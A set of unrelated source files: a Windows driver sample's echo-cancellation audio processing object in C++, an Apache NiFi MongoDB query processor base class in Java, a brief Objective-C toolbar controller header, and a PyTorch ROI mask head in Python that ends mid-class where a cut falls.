<reponame>galeksandrp/Windows-driver-samples // // AecApoMFX.cpp -- Copyright (c) Microsoft Corporation. All rights reserved. // // Description: // // Implementation of CAecApoMFX // #include <atlbase.h> #include <atlcom.h> #include <atlcoll.h> #include <atlsync.h> #include <mmreg.h> #include <initguid.h> #include <audioenginebaseapo.h> #include <baseaudioprocessingobject.h> #include <resource.h> #include <float.h> #include "AecApo.h" #include <devicetopology.h> #include <CustomPropKeys.h> #define SUPPORTED_AEC_SAMPLINGRATE (16000) // Static declaration of the APO_REG_PROPERTIES structure // associated with this APO. The number in <> brackets is the // number of IIDs supported by this APO. If more than one, then additional // IIDs are added at the end #pragma warning (disable : 4815) const AVRT_DATA CRegAPOProperties<1> CAecApoMFX::sm_RegProperties( __uuidof(AecApoMFX), // clsid of this APO L"Sample MFX Aec APO", // friendly name of this APO L"Copyright (c) Microsoft Corporation", // copyright info 1, // major version # 0, // minor version # __uuidof(IAudioProcessingObject), // iid of primary interface (APO_FLAG) (APO_FLAG_BITSPERSAMPLE_MUST_MATCH | APO_FLAG_FRAMESPERSECOND_MUST_MATCH), // kak check this DEFAULT_APOREG_MININPUTCONNECTIONS, DEFAULT_APOREG_MAXINPUTCONNECTIONS, DEFAULT_APOREG_MINOUTPUTCONNECTIONS, DEFAULT_APOREG_MAXOUTPUTCONNECTIONS, DEFAULT_APOREG_MAXINSTANCES ); #pragma AVRT_CODE_BEGIN //------------------------------------------------------------------------- // Description: // // Do the actual processing of data. // // Parameters: // // u32NumInputConnections - [in] number of input connections // ppInputConnections - [in] pointer to list of input APO_CONNECTION_PROPERTY pointers // u32NumOutputConnections - [in] number of output connections // ppOutputConnections - [in] pointer to list of output APO_CONNECTION_PROPERTY pointers // // Return values: // // void // // Remarks: // // This function processes data in a manner dependent on the implementing // object. This routine can not fail and can not block, or call any other // routine that blocks, or touch pagable memory. // STDMETHODIMP_(void) CAecApoMFX::APOProcess( UINT32 u32NumInputConnections, APO_CONNECTION_PROPERTY** ppInputConnections, UINT32 u32NumOutputConnections, APO_CONNECTION_PROPERTY** ppOutputConnections) { UNREFERENCED_PARAMETER(u32NumInputConnections); UNREFERENCED_PARAMETER(u32NumOutputConnections); FLOAT32 *pf32InputFrames, *pf32OutputFrames; ATLASSERT(m_bIsLocked); // assert that the number of input and output connectins fits our registration properties ATLASSERT(m_pRegProperties->u32MinInputConnections <= u32NumInputConnections); ATLASSERT(m_pRegProperties->u32MaxInputConnections >= u32NumInputConnections); ATLASSERT(m_pRegProperties->u32MinOutputConnections <= u32NumOutputConnections); ATLASSERT(m_pRegProperties->u32MaxOutputConnections >= u32NumOutputConnections); ATLASSERT(ppInputConnections[0]->u32Signature == APO_CONNECTION_PROPERTY_V2_SIGNATURE); ATLASSERT(ppOutputConnections[0]->u32Signature == APO_CONNECTION_PROPERTY_V2_SIGNATURE); APO_CONNECTION_PROPERTY_V2* inConnection = reinterpret_cast<APO_CONNECTION_PROPERTY_V2*>(ppInputConnections[0]); APO_CONNECTION_PROPERTY_V2* outConnection = reinterpret_cast<APO_CONNECTION_PROPERTY_V2*>(ppOutputConnections[0]); // check APO_BUFFER_FLAGS. switch( ppInputConnections[0]->u32BufferFlags ) { case BUFFER_INVALID: { ATLASSERT(false); // invalid flag - should never occur. don't do anything. 
break; } case BUFFER_VALID: case BUFFER_SILENT: { // get input pointer to connection buffer pf32InputFrames = reinterpret_cast<FLOAT32*>(ppInputConnections[0]->pBuffer); ATLASSERT( IS_VALID_TYPED_READ_POINTER(pf32InputFrames) ); // get output pointer to connection buffer pf32OutputFrames = reinterpret_cast<FLOAT32*>(ppOutputConnections[0]->pBuffer); ATLASSERT( IS_VALID_TYPED_WRITE_POINTER(pf32OutputFrames) ); // // Provide microphone buffer and timestamps to AEC algorithm // UNREFERENCED_PARAMETER(inConnection); UNREFERENCED_PARAMETER(outConnection); // Set the valid frame count. ppOutputConnections[0]->u32ValidFrameCount = ppInputConnections[0]->u32ValidFrameCount; ppOutputConnections[0]->u32BufferFlags = ppInputConnections[0]->u32BufferFlags; break; } default: { ATLASSERT(false); // invalid flag - should never occur break; } } // switch } // APOProcess #pragma AVRT_CODE_END //------------------------------------------------------------------------- // Description: // // Parameters: // // pTime - [out] hundreds-of-nanoseconds // // Return values: // // S_OK on success, a failure code on failure STDMETHODIMP CAecApoMFX::GetLatency(HNSTIME* pTime) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; IF_TRUE_ACTION_JUMP(NULL == pTime, hr = E_POINTER, Exit); *pTime = 0; Exit: return hr; } //------------------------------------------------------------------------- // Description: // // Verifies that the APO is ready to process and locks its state if so. // // Parameters: // // u32NumInputConnections - [in] number of input connections attached to this APO // ppInputConnections - [in] connection descriptor of each input connection attached to this APO // u32NumOutputConnections - [in] number of output connections attached to this APO // ppOutputConnections - [in] connection descriptor of each output connection attached to this APO // // Return values: // // S_OK Object is locked and ready to process. // E_POINTER Invalid pointer passed to function. // APOERR_INVALID_CONNECTION_FORMAT Invalid connection format. // APOERR_NUM_CONNECTIONS_INVALID Number of input or output connections is not valid on // this APO. STDMETHODIMP CAecApoMFX::LockForProcess(UINT32 u32NumInputConnections, APO_CONNECTION_DESCRIPTOR** ppInputConnections, UINT32 u32NumOutputConnections, APO_CONNECTION_DESCRIPTOR** ppOutputConnections) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; UNCOMPRESSEDAUDIOFORMAT uncompAudioFormat; // fill in the samples per frame for the output (since APO_FLAG_SAMPLESPERFRAME_MUST_MATCH is not selected) // There are two potentially different samples per frame values here. The input, which will be interleaved + primary. // And the output, which is just the primary. Because this is used for clearing the zeroing the output buffer, we're going // to fill it in with the output samples per frame. ProcessBuffer has both. hr = ppOutputConnections[0]->pFormat->GetUncompressedAudioFormat(&uncompAudioFormat); IF_FAILED_JUMP(hr, Exit); m_u32SamplesPerFrame = uncompAudioFormat.dwSamplesPerFrame; hr = CBaseAudioProcessingObject::LockForProcess(u32NumInputConnections, ppInputConnections, u32NumOutputConnections, ppOutputConnections); IF_FAILED_JUMP(hr, Exit); Exit: return hr; } // The method that this long comment refers to is "Initialize()" //------------------------------------------------------------------------- // Description: // // Generic initialization routine for APOs. // // Parameters: // // cbDataSize - [in] the size in bytes of the initialization data. 
// pbyData - [in] initialization data specific to this APO // // Return values: // // S_OK Successful completion. // E_POINTER Invalid pointer passed to this function. // E_INVALIDARG Invalid argument // AEERR_ALREADY_INITIALIZED APO is already initialized // // Remarks: // // This method initializes the APO. The data is variable length and // should have the form of: // // struct MyAPOInitializationData // { // APOInitBaseStruct APOInit; // ... // add additional fields here // }; // // If the APO needs no initialization or needs no data to initialize // itself, it is valid to pass NULL as the pbyData parameter and 0 as // the cbDataSize parameter. // // As part of designing an APO, decide which parameters should be // immutable (set once during initialization) and which mutable (changeable // during the lifetime of the APO instance). Immutable parameters must // only be specifiable in the Initialize call; mutable parameters must be // settable via methods on whichever parameter control interface(s) your // APO provides. Mutable values should either be set in the initialize // method (if they are required for proper operation of the APO prior to // LockForProcess) or default to reasonable values upon initialize and not // be required to be set before LockForProcess. // // Within the mutable parameters, you must also decide which can be changed // while the APO is locked for processing and which cannot. // // All parameters should be considered immutable as a first choice, unless // there is a specific scenario which requires them to be mutable; similarly, // no mutable parameters should be changeable while the APO is locked, unless // a specific scenario requires them to be. Following this guideline will // simplify the APO's state diagram and implementation and prevent certain // types of bug. // // If a parameter changes the APOs latency or MaxXXXFrames values, it must be // immutable. // // The default version of this function uses no initialization data, but does verify // the passed parameters and set the m_bIsInitialized member to true. // // Note: This method may not be called from a real-time processing thread. // HRESULT CAecApoMFX::Initialize(UINT32 cbDataSize, BYTE* pbyData) { HRESULT hr = S_OK; IF_TRUE_ACTION_JUMP( ((NULL == pbyData) && (0 != cbDataSize)), hr = E_INVALIDARG, Exit); IF_TRUE_ACTION_JUMP( ((NULL != pbyData) && (0 == cbDataSize)), hr = E_INVALIDARG, Exit); if (cbDataSize == sizeof(APOInitSystemEffects3)) { // // pbyData contains APOInitSystemEffects3 structure describing the microphone endpoint // APOInitSystemEffects3* papoSysFxInit3 = (APOInitSystemEffects3*)pbyData; m_initializedForEffectsDiscovery = papoSysFxInit3->InitializeForDiscoveryOnly; // Support for COMMUNICATIONS mode only when streaming IF_TRUE_ACTION_JUMP( !m_initializedForEffectsDiscovery && (papoSysFxInit3->AudioProcessingMode != AUDIO_SIGNALPROCESSINGMODE_COMMUNICATIONS), hr = E_INVALIDARG, Exit); m_audioSignalProcessingMode = papoSysFxInit3->AudioProcessingMode; // Register for notification of endpoint volume change in GetApoNotificationRegistrationInfo // Keep a reference to the device that will be registering for endpoint volume notifcations. IF_TRUE_ACTION_JUMP(papoSysFxInit3->pDeviceCollection == nullptr, hr = E_INVALIDARG, Exit); // Get the endpoint on which this APO has been created. It is the last device in the device collection. 
UINT32 numDevices; hr = papoSysFxInit3->pDeviceCollection->GetCount(&numDevices); IF_FAILED_JUMP(hr, Exit); IF_TRUE_ACTION_JUMP(numDevices <= 0, hr = E_INVALIDARG, Exit); hr = papoSysFxInit3->pDeviceCollection->Item(numDevices - 1, &m_spCaptureDevice); IF_FAILED_JUMP(hr, Exit); m_bIsInitialized = true; // Try to get the logging service, but ignore errors as failure to do logging it is not fatal. if(SUCCEEDED(papoSysFxInit3->pServiceProvider->QueryService(SID_AudioProcessingObjectLoggingService, IID_PPV_ARGS(&m_apoLoggingService)))) { m_apoLoggingService->ApoLog(APO_LOG_LEVEL_INFO, L"CAecApoMFX::Initialize called with APOInitSystemEffects3."); } } else if (cbDataSize == sizeof(APOInitSystemEffects2)) { // // pbyData contains APOInitSystemEffects2 structure describing the microphone endpoint // APOInitSystemEffects2* papoSysFxInit2 = (APOInitSystemEffects2*)pbyData; m_initializedForEffectsDiscovery = papoSysFxInit2->InitializeForDiscoveryOnly; // Support for COMMUNICATIONS mode only when streaming IF_TRUE_ACTION_JUMP( !m_initializedForEffectsDiscovery && (papoSysFxInit2->AudioProcessingMode != AUDIO_SIGNALPROCESSINGMODE_COMMUNICATIONS), hr = E_INVALIDARG, Exit); m_audioSignalProcessingMode = papoSysFxInit2->AudioProcessingMode; m_bIsInitialized = true; } else { hr = E_INVALIDARG; } Exit: return hr; } //------------------------------------------------------------------------- // Description: // // // // Parameters: // // // // Return values: // // // // Remarks: // // STDMETHODIMP CAecApoMFX::GetEffectsList(_Outptr_result_buffer_maybenull_(*pcEffects) LPGUID *ppEffectsIds, _Out_ UINT *pcEffects, _In_ HANDLE Event) { UNREFERENCED_PARAMETER(Event); *ppEffectsIds = NULL; *pcEffects = 0; if (m_audioSignalProcessingMode == AUDIO_SIGNALPROCESSINGMODE_COMMUNICATIONS) { // Return the list of effects implemented by this APO for COMMUNICATIONS processing mode static const GUID effectsList[] = { AUDIO_EFFECT_TYPE_ACOUSTIC_ECHO_CANCELLATION }; *ppEffectsIds = (LPGUID)CoTaskMemAlloc(sizeof(effectsList)); if (!*ppEffectsIds) { return E_OUTOFMEMORY; } *pcEffects = ARRAYSIZE(effectsList); CopyMemory(*ppEffectsIds, effectsList, sizeof(effectsList)); } return S_OK; } HRESULT IsInputFormatSupportedForAec(IAudioMediaType* pMediaType, BOOL * pSupported) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; UNCOMPRESSEDAUDIOFORMAT format; IF_TRUE_ACTION_JUMP((pMediaType == nullptr || pSupported == nullptr), hr = E_INVALIDARG, exit); hr = pMediaType->GetUncompressedAudioFormat(&format); IF_FAILED_JUMP(hr, exit); *pSupported = format.dwBytesPerSampleContainer == 4 && format.dwValidBitsPerSample == 32 && format.fFramesPerSecond == SUPPORTED_AEC_SAMPLINGRATE && // We only support one sampling rate at the input format.dwSamplesPerFrame <= 16 && // We only support <= 16 channels at the input format.guidFormatType == KSDATAFORMAT_SUBTYPE_IEEE_FLOAT; exit: return hr; } HRESULT IsOutputFormatSupportedForAec(IAudioMediaType* pMediaType, BOOL * pSupported) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; UNCOMPRESSEDAUDIOFORMAT format; IF_TRUE_ACTION_JUMP((pMediaType == nullptr || pSupported == nullptr), hr = E_INVALIDARG, exit); hr = pMediaType->GetUncompressedAudioFormat(&format); IF_FAILED_JUMP(hr, exit); *pSupported = format.dwBytesPerSampleContainer == 4 && format.dwValidBitsPerSample == 32 && format.fFramesPerSecond == SUPPORTED_AEC_SAMPLINGRATE && format.dwSamplesPerFrame == 1 && // We only mono output format.guidFormatType == KSDATAFORMAT_SUBTYPE_IEEE_FLOAT; exit: return hr; } HRESULT CreatePreferredInputMediaType(IAudioMediaType** 
ppMediaType, UINT32 requestedInputChannelCount) { ASSERT_NONREALTIME(); // Default to mono format // We will adjust the channel count based on the requested format later on UNCOMPRESSEDAUDIOFORMAT format = { KSDATAFORMAT_SUBTYPE_IEEE_FLOAT, 1, 4, 32, SUPPORTED_AEC_SAMPLINGRATE, KSAUDIO_SPEAKER_DIRECTOUT }; // Match the channel count of the input if it is less than 16 if (requestedInputChannelCount <= 16) { format.dwSamplesPerFrame = requestedInputChannelCount; format.dwChannelMask = KSAUDIO_SPEAKER_DIRECTOUT; } return CreateAudioMediaTypeFromUncompressedAudioFormat(&format, ppMediaType); } HRESULT CreatePreferredOutputMediaType(IAudioMediaType** ppMediaType) { ASSERT_NONREALTIME(); // Output is mono @ the same sampling rate as the input UNCOMPRESSEDAUDIOFORMAT format = { KSDATAFORMAT_SUBTYPE_IEEE_FLOAT, 1, 4, 32, SUPPORTED_AEC_SAMPLINGRATE, KSAUDIO_SPEAKER_DIRECTOUT }; return CreateAudioMediaTypeFromUncompressedAudioFormat(&format, ppMediaType); } //------------------------------------------------------------------------- // Description: // // // // Parameters: // // // // Return values: // // // // Remarks: // // STDMETHODIMP CAecApoMFX::IsInputFormatSupported(IAudioMediaType *pOutputFormat, IAudioMediaType *pRequestedInputFormat, IAudioMediaType **ppSupportedInputFormat) { ASSERT_NONREALTIME(); HRESULT hResult; IF_TRUE_ACTION_JUMP((NULL == pRequestedInputFormat) || (NULL == ppSupportedInputFormat), hResult = E_POINTER, Exit); *ppSupportedInputFormat = NULL; // This method here is called in the context of the MIC endpoint // There are 2 supported scenarios // - The AEC APO can handle any mic format // - The AEC APO can support exactly 1 input format // // For the purposes of this sample AEC APO, we pretend that the AEC APO supports exactly 1 format // - a sampling rate of SUPPORTED_AEC_SAMPLINGRATE. The APO can accept upto 16 channels at the input // and will output mono audio. // if (pOutputFormat) { // Is this a valid format that we support at the output? 
BOOL bSupportedOut = FALSE; hResult = IsOutputFormatSupportedForAec(pOutputFormat, &bSupportedOut); IF_FAILED_JUMP(hResult, Exit); if (!bSupportedOut) { return APOERR_FORMAT_NOT_SUPPORTED; } } BOOL bSupported = FALSE; hResult = IsInputFormatSupportedForAec(pRequestedInputFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); if (!bSupported) { hResult = CreatePreferredInputMediaType(ppSupportedInputFormat, pRequestedInputFormat->GetAudioFormat()->nChannels); IF_FAILED_JUMP(hResult, Exit); return S_FALSE; } pRequestedInputFormat->AddRef(); *ppSupportedInputFormat = pRequestedInputFormat; Exit: return hResult; } //------------------------------------------------------------------------- // Description: // // // // Parameters: // // // // Return values: // // // // Remarks: // // STDMETHODIMP CAecApoMFX::IsOutputFormatSupported(IAudioMediaType *pInputFormat, IAudioMediaType *pRequestedOutputFormat, IAudioMediaType **ppSupportedOutputFormat) { ASSERT_NONREALTIME(); HRESULT hResult; IF_TRUE_ACTION_JUMP((NULL == pRequestedOutputFormat) || (NULL == ppSupportedOutputFormat), hResult = E_POINTER, Exit); *ppSupportedOutputFormat = NULL; if (pInputFormat != nullptr) { BOOL bSupportedIn = FALSE; hResult = IsInputFormatSupportedForAec(pInputFormat, &bSupportedIn); IF_FAILED_JUMP(hResult, Exit); if (!bSupportedIn) { return APOERR_FORMAT_NOT_SUPPORTED; } } BOOL bSupported = FALSE; hResult = IsOutputFormatSupportedForAec(pRequestedOutputFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); if (!bSupported) { hResult = CreatePreferredOutputMediaType(ppSupportedOutputFormat); IF_FAILED_JUMP(hResult, Exit); return S_FALSE; } pRequestedOutputFormat->AddRef(); *ppSupportedOutputFormat = pRequestedOutputFormat; Exit: return hResult; } STDMETHODIMP CAecApoMFX::AddAuxiliaryInput( DWORD dwInputId, UINT32 cbDataSize, BYTE *pbyData, APO_CONNECTION_DESCRIPTOR * pInputConnection ) { HRESULT hResult = S_OK; CComPtr<IAudioMediaType> spSupportedType; ASSERT_NONREALTIME(); IF_TRUE_ACTION_JUMP(m_bIsLocked, hResult = APOERR_APO_LOCKED, Exit); IF_TRUE_ACTION_JUMP(!m_bIsInitialized, hResult = APOERR_NOT_INITIALIZED, Exit); BOOL bSupported = FALSE; hResult = IsInputFormatSupportedForAec(pInputConnection->pFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); IF_TRUE_ACTION_JUMP(!bSupported, hResult = APOERR_FORMAT_NOT_SUPPORTED, Exit); // This APO can only handle 1 auxiliary input IF_TRUE_ACTION_JUMP(m_auxiliaryInputId != 0, hResult = APOERR_NUM_CONNECTIONS_INVALID, Exit); m_auxiliaryInputId = dwInputId; IF_TRUE_ACTION_JUMP( ((NULL == pbyData) && (0 != cbDataSize)), hResult = E_INVALIDARG, Exit); IF_TRUE_ACTION_JUMP( ((NULL != pbyData) && (0 == cbDataSize)), hResult = E_INVALIDARG, Exit); if (cbDataSize == sizeof(APOInitSystemEffects3)) { /* // // pbyData contains APOInitSystemEffects3 structure describing the loopback endpoint // APOInitSystemEffects3* papoSysFxInit3 = (APOInitSystemEffects3*)pbyData; // Register for notification in GetApoNotificationRegistrationInfo // Keep a reference to the loopback device that will be registering for endpoint volume notifcations. 
IF_TRUE_ACTION_JUMP(papoSysFxInit3->pDeviceCollection == nullptr, hResult = E_INVALIDARG, Exit); UINT32 numDevices; hResult = papoSysFxInit3->pDeviceCollection->GetCount(&numDevices); IF_FAILED_JUMP(hResult, Exit); IF_TRUE_ACTION_JUMP(numDevices <= 0, hResult = E_INVALIDARG, Exit); hResult = papoSysFxInit3->pDeviceCollection->Item(numDevices - 1, &m_spLoopbackDevice); IF_FAILED_JUMP(hResult, Exit); */ } else { // // pbyData contains APOInitSystemEffects2 structure describing the render endpoint // } // Signal to AEC algorithm that there is a reference audio stream Exit: return hResult; } STDMETHODIMP CAecApoMFX::RemoveAuxiliaryInput(DWORD dwInputId) { HRESULT hResult = S_OK; ASSERT_NONREALTIME(); IF_TRUE_ACTION_JUMP(m_bIsLocked, hResult = APOERR_APO_LOCKED, Exit); IF_TRUE_ACTION_JUMP(!m_bIsInitialized, hResult = APOERR_NOT_INITIALIZED, Exit); // This APO can only handle 1 auxiliary input IF_TRUE_ACTION_JUMP(m_auxiliaryInputId != dwInputId, hResult = APOERR_INVALID_INPUTID, Exit); m_auxiliaryInputId = 0; // Signal to AEC algorithm that there is no longer any reference audio stream Exit: return hResult; } STDMETHODIMP CAecApoMFX::IsInputFormatSupported(IAudioMediaType* pRequestedInputFormat, IAudioMediaType** ppSupportedInputFormat) { ASSERT_NONREALTIME(); HRESULT hResult = S_OK; IF_TRUE_ACTION_JUMP((NULL == pRequestedInputFormat) || (NULL == ppSupportedInputFormat), hResult = E_POINTER, Exit); BOOL bSupported = FALSE; hResult = IsInputFormatSupportedForAec(pRequestedInputFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); if (!bSupported) { hResult = CreatePreferredInputMediaType(ppSupportedInputFormat, pRequestedInputFormat->GetAudioFormat()->nChannels); IF_FAILED_JUMP(hResult, Exit); return S_FALSE; } pRequestedInputFormat->AddRef(); *ppSupportedInputFormat = pRequestedInputFormat; Exit: return hResult; } // IAPOAuxiliaryInputRT STDMETHODIMP_(void) CAecApoMFX::AcceptInput(DWORD dwInputId, const APO_CONNECTION_PROPERTY * pInputConnection) { ASSERT_REALTIME(); ATLASSERT(m_bIsInitialized); ATLASSERT(m_bIsLocked); ATLASSERT(pInputConnection->u32Signature == APO_CONNECTION_PROPERTY_V2_SIGNATURE); ATLASSERT(dwInputId == m_auxiliaryInputId); UNREFERENCED_PARAMETER(dwInputId); const APO_CONNECTION_PROPERTY_V2* connectionV2 = reinterpret_cast<const APO_CONNECTION_PROPERTY_V2*>(pInputConnection); // Check connectionV2->property.u32BufferFlags to see whether loopback buffer is silent // Provide loopback buffer and timestamp to AEC algorithm UNREFERENCED_PARAMETER(connectionV2); } STDMETHODIMP CAecApoMFX::GetApoNotificationRegistrationInfo(_Out_writes_(*count) APO_NOTIFICATION_DESCRIPTOR** apoNotifications, _Out_ DWORD* count) { *apoNotifications = nullptr; *count = 0; /* RETURN_HR_IF_NULL(E_FAIL, m_spCaptureDevice); RETURN_HR_IF_NULL(E_FAIL, m_spLoopbackDevice); // Let the OS know what notifications we are interested in by returning an array of // APO_NOTIFICATION_DESCRIPTORs. constexpr DWORD numDescriptors = 2; wil::unique_cotaskmem_ptr<APO_NOTIFICATION_DESCRIPTOR[]> apoNotificationDescriptors; apoNotificationDescriptors.reset( static_cast<APO_NOTIFICATION_DESCRIPTOR*>(CoTaskMemAlloc(sizeof(APO_NOTIFICATION_DESCRIPTOR) * numDescriptors))); RETURN_IF_NULL_ALLOC(apoNotificationDescriptors); // Our APO wants to get notified when an endpoint volume changes on the capture endpoint.
apoNotificationDescriptors[0].type = APO_NOTIFICATION_TYPE_ENDPOINT_VOLUME; (void)m_spCaptureDevice->QueryInterface(&apoNotificationDescriptors[0].audioEndpointVolume.device); // Our APO wants to get notified when a endpoint volume changes on the auxiliary input endpoint. apoNotificationDescriptors[1].type = APO_NOTIFICATION_TYPE_ENDPOINT_VOLUME; (void)m_spLoopbackDevice->QueryInterface(&apoNotificationDescriptors[1].audioEndpointVolume.device); *apoNotifications = apoNotificationDescriptors.release(); *count = numDescriptors; */ return S_OK; } static bool IsSameEndpointId(IMMDevice* device1, IMMDevice* device2) { bool isSameEndpointId = false; wil::unique_cotaskmem_string deviceId1; if (SUCCEEDED(device1->GetId(&deviceId1))) { wil::unique_cotaskmem_string deviceId2; if (SUCCEEDED(device2->GetId(&deviceId2))) { isSameEndpointId = (CompareStringOrdinal(deviceId1.get(), -1, deviceId2.get(), -1, TRUE) == CSTR_EQUAL); } } return isSameEndpointId; } // HandleNotification is called whenever there is a change that matches any of the // APO_NOTIFICATION_DESCRIPTOR elements in the array that was returned by GetApoNotificationRegistrationInfo. // Note that the APO will have to query each property once to get its initial value because this method is // only invoked when any of the properties have changed. STDMETHODIMP_(void) CAecApoMFX::HandleNotification(_In_ APO_NOTIFICATION* /* apoNotification */) { // Handle endpoint volume change /* if (apoNotification->type == APO_NOTIFICATION_TYPE_ENDPOINT_PROPERTY_CHANGE) { if (IsSameEndpointId(apoNotification->audioEndpointVolumeChange.endpoint, m_spCaptureDevice)) { m_captureEndpointMasterVolume = apoNotification->audioEndpointVolumeChange.volume->fMasterVolume; } else if (IsSameEndpointId(apoNotification->audioEndpointVolumeChange.endpoint, m_spLoopbackDevice)) { m_loopbackEndpointMasterVolume = apoNotification->audioEndpointVolumeChange.volume->fMasterVolume; } } else if (apoNotification->type == APO_NOTIFICATION_TYPE_ENDPOINT_PROPERTY_CHANGE) { } else if(apoNotification->type == APO_NOTIFICATION_TYPE_SYSTEM_EFFECTS_PROPERTY_CHANGE) { } */ }
11,649
3,212
<filename>nifi-nar-bundles/nifi-mongodb-bundle/nifi-mongodb-processors/src/main/java/org/apache/nifi/processors/mongodb/AbstractMongoQueryProcessor.java /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.nifi.processors.mongodb; import com.mongodb.client.MongoCollection; import org.apache.nifi.components.PropertyDescriptor; import org.apache.nifi.expression.ExpressionLanguageScope; import org.apache.nifi.flowfile.FlowFile; import org.apache.nifi.flowfile.attributes.CoreAttributes; import org.apache.nifi.processor.ProcessContext; import org.apache.nifi.processor.ProcessSession; import org.apache.nifi.processor.Relationship; import org.apache.nifi.processor.exception.ProcessException; import org.apache.nifi.processor.util.JsonValidator; import org.apache.nifi.processor.util.StandardValidators; import org.bson.Document; import java.io.ByteArrayOutputStream; import java.util.HashMap; import java.util.Map; public abstract class AbstractMongoQueryProcessor extends AbstractMongoProcessor { public static final String DB_NAME = "mongo.database.name"; public static final String COL_NAME = "mongo.collection.name"; public static final Relationship REL_SUCCESS = new Relationship.Builder() .name("success") .description("All FlowFiles that have the results of a successful query execution go here.") .build(); public static final Relationship REL_FAILURE = new Relationship.Builder() .name("failure") .description("All input FlowFiles that are part of a failed query execution go here.") .build(); public static final Relationship REL_ORIGINAL = new Relationship.Builder() .name("original") .description("All input FlowFiles that are part of a successful query execution go here.") .build(); public static final PropertyDescriptor QUERY = new PropertyDescriptor.Builder() .name("Query") .description("The selection criteria to do the lookup. If the field is left blank, it will look for input from" + " an incoming connection from another processor to provide the query as a valid JSON document inside of " + "the FlowFile's body. 
If this field is left blank and a timer is enabled instead of an incoming connection, " + "that will result in a full collection fetch using a \"{}\" query.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(JsonValidator.INSTANCE) .build(); public static final PropertyDescriptor PROJECTION = new PropertyDescriptor.Builder() .name("Projection") .description("The fields to be returned from the documents in the result set; must be a valid BSON document") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(JsonValidator.INSTANCE) .build(); public static final PropertyDescriptor SORT = new PropertyDescriptor.Builder() .name("Sort") .description("The fields by which to sort; must be a valid BSON document") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(JsonValidator.INSTANCE) .build(); public static final PropertyDescriptor LIMIT = new PropertyDescriptor.Builder() .name("Limit") .description("The maximum number of elements to return") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.POSITIVE_INTEGER_VALIDATOR) .build(); public static final PropertyDescriptor BATCH_SIZE = new PropertyDescriptor.Builder() .name("Batch Size") .description("The number of elements to be returned from the server in one batch") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.POSITIVE_INTEGER_VALIDATOR) .build(); static final PropertyDescriptor RESULTS_PER_FLOWFILE = new PropertyDescriptor.Builder() .name("results-per-flowfile") .displayName("Results Per FlowFile") .description("How many results to put into a FlowFile at once. The whole body will be treated as a JSON array of results.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.POSITIVE_INTEGER_VALIDATOR) .build(); protected Document getQuery(ProcessContext context, ProcessSession session, FlowFile input) { Document query = null; if (context.getProperty(QUERY).isSet()) { query = Document.parse(context.getProperty(QUERY).evaluateAttributeExpressions(input).getValue()); } else if (!context.getProperty(QUERY).isSet() && input == null) { query = Document.parse("{}"); } else { try { ByteArrayOutputStream out = new ByteArrayOutputStream(); session.exportTo(input, out); out.close(); query = Document.parse(new String(out.toByteArray())); } catch (Exception ex) { getLogger().error("Error reading FlowFile : ", ex); throw new ProcessException(ex); } } return query; } protected Map<String, String> getAttributes(ProcessContext context, FlowFile input, Document query, MongoCollection collection) { final Map<String, String> attributes = new HashMap<>(); attributes.put(CoreAttributes.MIME_TYPE.key(), "application/json"); if (context.getProperty(QUERY_ATTRIBUTE).isSet()) { final String queryAttr = context.getProperty(QUERY_ATTRIBUTE).evaluateAttributeExpressions(input).getValue(); attributes.put(queryAttr, query.toJson()); } attributes.put(DB_NAME, collection.getNamespace().getDatabaseName()); attributes.put(COL_NAME, collection.getNamespace().getCollectionName()); return attributes; } }
//
//  ASMediaFocusBasicToolbarController.h
//  ASMediaFocusExemple
//
//  Created by <NAME> on 05/02/2016.
//  Copyright © 2016 AutreSphere. All rights reserved.
//

#import <UIKit/UIKit.h>

@interface ASMediaFocusBasicToolbarController : UIViewController

@property (strong, nonatomic) IBOutlet UIButton *doneButton;

@end
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch
from torch import nn

from mega_core.structures.bounding_box import BoxList

from .roi_mask_feature_extractors import make_roi_mask_feature_extractor
from .roi_mask_predictors import make_roi_mask_predictor
from .inference import make_roi_mask_post_processor
from .loss import make_roi_mask_loss_evaluator


def keep_only_positive_boxes(boxes):
    """
    Given a set of BoxList containing the `labels` field,
    return a set of BoxList for which `labels > 0`.

    Arguments:
        boxes (list of BoxList)
    """
    assert isinstance(boxes, (list, tuple))
    assert isinstance(boxes[0], BoxList)
    assert boxes[0].has_field("labels")
    positive_boxes = []
    positive_inds = []
    num_boxes = 0
    for boxes_per_image in boxes:
        labels = boxes_per_image.get_field("labels")
        inds_mask = labels > 0
        inds = inds_mask.nonzero().squeeze(1)
        positive_boxes.append(boxes_per_image[inds])
        positive_inds.append(inds_mask)
    return positive_boxes, positive_inds


class ROIMaskHead(torch.nn.Module):
    def __init__(self, cfg, in_channels):
        super(ROIMaskHead, self).__init__()
        self.cfg = cfg.clone()
        self.feature_extractor = make_roi_mask_feature_extractor(cfg, in_channels)
        self.predictor = make_roi_mask_predictor(
            cfg, self.feature_extractor.out_channels)
        self.post_processor = make_roi_mask_post_processor(cfg)
